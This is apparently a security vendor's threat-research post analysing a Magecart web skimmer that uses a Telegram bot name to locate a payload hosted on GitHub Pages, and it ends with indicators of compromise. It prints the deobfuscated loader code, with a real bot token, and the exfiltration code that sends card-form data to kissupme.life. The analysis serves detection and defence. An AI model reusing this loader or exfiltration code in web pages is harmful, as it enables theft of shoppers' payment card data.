eComscan secures over 7,000 online stores
  • 30-day money back guarantee
  • Easy 5 minute install
  • Cancel any time
Get started in 5 minutes!
Secure your store today.
CLICK HERE

Malware Persistence via Telegram and GitHub

  • August 22, 2023

    Web Skimming / Sansec Threat Research
    Learn about new eCommerce hacks?

    Receive an alert whenever we discover new hacks or vulnerabilities that may affect your online store.

  • What is
    Magecart?

    Also known as digital skimming, this crime has surged since 2015. Criminals steal card data during online shopping. Who are behind these notorious hacks, how does it work, and how have Magecart attacks evolved over time?

    About Magecart

Attackers are devising ingenious methods to prolong their skimming activities, aiming for sustained persistence.

The usual tactics, techniques, and procedures (TTP) include the creation of disposable domains to house malware and facilitate the extraction of credit card information.

However, these throwaway domains are susceptible to takedowns and often become swiftly identified by malware researchers.

A novel variant of the Magecart threat has surfaced, aiming to circumvent these challenges.

Telegram Loader

The loader is first hidden behind obfuscation. However, once this obfuscation is removed, it becomes evident what is taking place:

fetch('https://api.telegram.org/bot6167771222:AAFLu6qy3CVPwosDZKlnuk0tLI-WBxq0RCk/getMe')
    .then(resp => resp.json())
    .then(resp => {
        const [username, path] = resp.result.first_name.split(',')
        const script = document.createElement('script')
        script.src = 'https://' + username + '.github.io/' + path + '.js?r=' + Math.random()
        try {
            document.body.appendChild(script)
        } catch (e) {
            document.head.appendChild(script)
        }
    })
  1. Initially, a request is sent to the Telegram bot API to fetch specific information about a designated bot: https://api.telegram.org/bot6167771222:AAFLu6qy3CVPwosDZKlnuk0tLI-WBxq0RCk/getMe.
  2. The "first name" of the bot is then divided using a comma as the separator.
  3. The first part contains the GitHub username.
  4. The subsequent part indicates the file path intended for loading.
  5. Afterward, a script is attached to the webpage found at https://<username>.github.io/<path>.js.

This approach eliminates the need for the attacker to utilize a disposable domain or set up infrastructure for hosting malicious scripts. This is due to the fact that the scripts are directly loaded from GitHub.

Furthermore, even if GitHub takes action to deactivate this account, the individual could easily create a new account and update the Telegram bot's name accordingly.

GitHub Hosted Multi-Skimmer

The current response from the Telegram API takes the form of the following JSON structure:

{
  "ok": true,
  "result": {
    "id": 6167771222,
    "is_bot": true,
    "first_name": "jubilmaria,homepage/swco",
    "username": "asddq4t44w3f45y45refbot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false
  }
}

This dataset allows us to deduce the following insights:

  • The GitHub account corresponds to jubilmaria.

  • The repository in question is labeled as homepage.

  • The specific script designated for loading is identified as swco.js.

While this repository outwardly presents itself as a legitimate entity:

The contents concealed within are, in reality, malicious and are exposed through GitHub Pages.

The loaded script, swco.js, is composed of four distinct skimmers, each finely tuned to specific targets. swco.js performs checks on window.location.host and window.location.href against a roster of compromised stores, subsequently selecting from three skimmer variations:

  1. Authorizenet (Magento 2)
  2. Klarna Checkout
  3. Authorizenet (WooCommerce)

In cases where the current window location lacks a precise store match, the script defaults to a more generalized skimmer designed to exploit both Magento and WooCommerce platforms.

Across all versions, users are confronted with a counterfeit credit card form. The data inputted into these forms is then transferred to https://kissupme.life/a:

fetch('https://kissupme.life/a', {
    headers: {
        Accept: 'application/json',
        'Content-Type': 'application/json'
    },
    body: JSON.stringify(_0x1e3c4c),
    method: 'POST'
}).then(_0x4900b6 => {
    setTimeout(() => {
        alert('Waiting time exceeded');
        window.location.reload();
    }, 2500);
}).catch(_0x112e4a => {
    new Image().src = 'https://kissupme.life/a?data=' + encodeURIComponent(JSON.stringify(_0x1e3c4c));
    setTimeout(() => {
        alert('Waiting time exceeded');
        window.location.reload();
    }, 2500);
});

Initially, an attempt is made to initiate a POST request for data exfiltration. Should this prove unsuccessful, an alternative method involving a fake Image is employed as an exfiltration mechanism.

Once 2.5 seconds have transpired, an alert is presented to the user, accompanied by a page refresh. Following this reload, the user is presented with the authentic credit card form.

At present, the domain resolves to 51.161.204.249, a dedicated server registered with Regxa, Ltd.

IOCs

  • jubilmaria

  • kissupme.life

  • 51.161.204.249

  • bot6167771222

  • asddq4t44w3f45y45refbot

Hackers get smarter every day.
Outsmart them with eComscan.

eComscan is the automated backend security scanner that keeps your online store safe from attackers. Discover vulnerabilities and malicious activity instantly.
Sansec experts study dozens of hacks every day to keep you protected. Sansec is the only company specializing in Magento security and is a proud Adobe partner.

Scan now